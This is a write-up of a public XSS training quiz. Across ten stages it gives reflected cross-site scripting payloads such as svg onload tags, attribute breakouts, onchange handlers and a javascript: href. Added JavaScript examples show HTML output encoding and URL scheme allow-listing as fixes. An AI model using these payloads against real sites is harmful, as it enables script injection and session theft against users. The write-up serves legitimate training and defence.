XSS_Challenges Write Up

Contents
  1. XSS Challenges Write Up
    1.1. stage #1
    1.2. stage #2
    1.3. stage #3
    1.4. stage #4
    1.5. stage #5
    1.6. stage #6
    1.7. stage #7
    1.8. stage #8
    1.9. stage #9
    1.10. stage #10


stage #1

The input is reflected inside a tag with no escaping, so simply close the existing tag and construct a new one:

</b><svg/onload=alert(document.domain)><b>

stage #2

The input lands inside a double-quoted attribute, so close the double quote, close the tag, and then construct a new tag:

"><svg/onload= alert(document.domain)><

stage #3

The only visible injection point is inside the b tag, and there both double quotes and angle brackets are escaped.

However, the value of the select box that follows is also printed back to the page, and that parameter is not escaped. Intercept the request and put the payload in the second parameter:

p1=sda&p2=Japan<svg/onload=alert(document.domain)>

stage #4

Similar to stage 3: parameters p1 and p2 are both escaped, but there is a hidden parameter p3 that is under our control. Intercept the request, modify p3 and build the payload there:

p1=asd&p2=Japan&p3=hacxxxxx"><svg/onload=alert(document.domain)>

stage #5

The submitted value is reflected unchanged inside the input box, but the field has a length limit. Open the developer tools (F12), inspect the element and remove the length restriction, then submit a payload that closes the quoted value and the tag:

"><svg/onload=alert(document.domain)>

stage #6

Compared with stage 5, the angle brackets are now converted to HTML entities, but the double quote is still under our control, so an event handler attribute can be added to the input tag:

" onchange=alert(document.domain)"

After submitting, type anything into the box so that the input's value changes; the change event fires and triggers the XSS.

stage #7

Compared with stage 5, both double quotes and angle brackets are escaped this time. In HTML, however, a double quote is not the only attribute delimiter: when an attribute value is written without quotes, a space ends the value and starts a new attribute.

payload:

1 onchange=alert(document.domain)
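Stages 1 through 7 are the same defect seen from the server side: a reflected value that is encoded for the wrong context, or not encoded at all. The block below is an added example and is not code from the quiz or the original write-up; it shows context-aware HTML output encoding, the fix for all seven stages. `renderResult` and `renderInput` are constructed templates standing in for the quiz pages, not the real markup. The weak encoder reproduces the stage 6 filter (angle brackets only), the `quoteAttr: false` option reproduces the stage 7 template (unquoted attribute), and `readValueAttribute` reads the attribute back the way a parser would, so the round trip shows whether the value ever escaped its context.

```javascript
// Added example, not the quiz's code: context-aware HTML output encoding.
// Payload strings are the ones from the write-up above, used here as test
// input for the encoders.
const STAGE1_PAYLOAD = '</b><svg/onload=alert(document.domain)><b>';
const STAGE6_PAYLOAD = '" onchange=alert(document.domain)"';
const STAGE7_PAYLOAD = '1 onchange=alert(document.domain)';

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
const REVERSE_MAP = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };

// Full encoder: safe for element text and for a value inside a
// double-quoted attribute. Encoding '&' first-class keeps decoding lossless.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Weak encoder resembling the stage 6 filter: only angle brackets.
// A double quote still terminates a quoted attribute value.
function encodeAnglesOnly(value) {
  return String(value).replace(/[<>]/g, (ch) => ENTITY_MAP[ch]);
}

// Constructed stand-in for the stage 5-7 search field.
//   encoder   : which filter the template applies to the reflected value
//   quoteAttr : false reproduces the stage 7 template, which emits value=...
//               without quotes, so a space starts a new attribute
function renderInput(value, { encoder = encodeHtml, quoteAttr = true } = {}) {
  const encoded = encoder(value);
  return quoteAttr
    ? `<input type="text" name="p1" value="${encoded}">`
    : `<input type="text" name="p1" value=${encoded}>`;
}

// Constructed stand-in for the stage 1-4 result line: every reflected
// parameter is encoded, including the select value p2 and the hidden p3
// (stages 3 and 4 were lost by encoding p1 only).
function renderResult({ p1 = '', p2 = '', p3 = '' }) {
  return `<b>"${encodeHtml(p1)}" in ${encodeHtml(p2)}${encodeHtml(p3)}</b>`;
}

function decodeHtml(text) {
  return text.replace(/&(amp|lt|gt|quot|#x27);/g, (_, name) => REVERSE_MAP[name]);
}

// Reads back what a parser treats as the value attribute: a double-quoted
// value ends at the next raw '"'. Returns the decoded value, or null when
// there is no quoted value attribute at all (the unquoted stage 7 case).
function readValueAttribute(html) {
  const match = /value="([^"]*)"/.exec(html);
  return match ? decodeHtml(match[1]) : null;
}

// Round-trip check: the reflected value survives intact only when it was
// encoded for the attribute context and the attribute was quoted.
function valueSurvivesRoundTrip(value, options) {
  return readValueAttribute(renderInput(value, options)) === value;
}
```

With the full encoder and a quoted attribute both the stage 6 and stage 7 payloads come back as plain text; with the angle-bracket-only filter the read-back value is empty, because the attribute closed at the payload's first quote, and with the unquoted template no value attribute can be recovered at all.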

stage #8

This time the input is reflected into the href of an a tag, so a javascript: pseudo-protocol URL makes clicking the link trigger the XSS:

javascript:alert(document.domain)
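Stage 8 is the case where attribute encoding alone does not help: `javascript:alert(document.domain)` contains nothing that needs encoding, it is a perfectly valid attribute value, and the browser still runs it on click. The defence is to treat the value as a URL rather than as text and allow-list its scheme. The block below is an added example and not the quiz's own code; `safeHref` parses the input with the WHATWG `URL` constructor (which normalises case and surrounding whitespace, so no prefix matching is needed) and accepts only http and https, while `renderLink` is a constructed template that falls back to an inert link for anything rejected. The base origin `https://example.invalid/` is an assumption used only to resolve relative links.

```javascript
// Added example, not the quiz's code: URL scheme allow-listing for href.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns the normalised absolute URL when its scheme is allowed,
// otherwise null so the caller can drop the link. `base` is a constructed
// origin used to resolve relative links such as "/stage00008.php".
function safeHref(input, base = 'https://example.invalid/') {
  let url;
  try {
    // The URL parser lower-cases the scheme and strips leading/trailing
    // whitespace, so the check below is on the canonical protocol.
    url = new URL(String(input), base);
  } catch (err) {
    return null; // unparsable input is rejected rather than reflected
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Minimal attribute encoder so the accepted URL is also safe as text.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Constructed stand-in for the stage 8 link. Scheme check first, then
// attribute encoding: the two controls cover different failure modes.
function renderLink(input) {
  const href = safeHref(input);
  if (href === null) {
    return '<a href="#">blocked link</a>';
  }
  return `<a href="${encodeAttr(href)}">${encodeAttr(href)}</a>`;
}
```

The order matters: `safeHref` decides whether the value may be a link at all, and `encodeAttr` then keeps the accepted URL from breaking out of the attribute, so neither control is a substitute for the other.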

stage #9

UTF-7 XSS. This one needs the IE7 browser, which you basically never run into any more, and I don't have that environment either, so I skipped it from the console.

stage #10

http://xss-quiz.int21h.jp/stage00010.php?sid=8f2801ef982d78f46ef7796eae24548546390031